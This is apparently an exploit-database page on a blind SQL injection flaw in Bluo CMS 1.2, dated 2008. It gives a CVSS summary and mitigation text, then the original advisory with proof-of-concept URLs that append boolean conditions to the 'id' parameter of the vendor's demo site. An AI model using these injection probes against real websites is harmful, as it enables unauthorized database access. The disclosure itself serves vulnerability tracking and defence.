Bluo cms 1.2 blind sql injection Vulnerability

vendor:

Bluo cms

by:

The_5p3ctrum

7.5

CVSS

HIGH

Blind SQL Injection

Not mentioned

CWE

Product Name: Bluo cms

Affected Version From: 1.2

Affected Version To: 1.2

Patch Exists: NO

Related CWE: Not mentioned

CPE: Not mentioned

Metasploit:

Other Scripts:

Platforms Tested: Not mentioned

Not mentioned

Bluo cms 1.2 blind sql injection Vulnerability

The Bluo cms 1.2 is vulnerable to blind SQL injection. An attacker can exploit this vulnerability to extract sensitive information from the database by injecting malicious SQL queries.

Mitigation:

The vendor has not provided any mitigation or remediation for this vulnerability. It is recommended to update to a newer version of the CMS or switch to a different CMS that does not have this vulnerability.

Source

Exploit-DB raw data:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                                                                     +
        Bluo cms 1.2  blind sql injection Vulnerability              +
                                                                     +
Discovered by : The_5p3ctrum                                         +
Contact AUTHOR: sp3[at]linuxmail.org & 5p[at]linuxmail.org           +                                                            +
                                                                     +
                      Mor0ccan Nightmares                            +
                                                                     +
                                                                     +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

#####################################################

APPLICATION    : bluocms
DOWNLOAD(299 $): http://www.bluocms.com/shop.php
VENDOR         : http://www.bluocms.com
DEMO           : http://www.bluocms.com/demo

#####################################################


[+] vuln    : blind sql injection
              

[+] Exploit : 
              true:
               
              http://www.bluocms.com/demo/index.php?id=511 and substring(@@version,1,1)=5
              http://www.bluocms.com/demo/index.php?id=511 and 1=1
              
              false:
              
              http://www.bluocms.com/demo/index.php?id=511 and substring(@@version,1,1)=4
              http://www.bluocms.com/demo/index.php?id=511 and 1=2

##########################################################################################################
                                                                                                         #
# Greetings: str0ke, BayHay, Cyber-Zone, Drackanz, The_leo, The_Casper, Fucker_Net, And All my friends   #
                                                                                                         #
##########################################################################################################

# milw0rm.com [2008-11-28]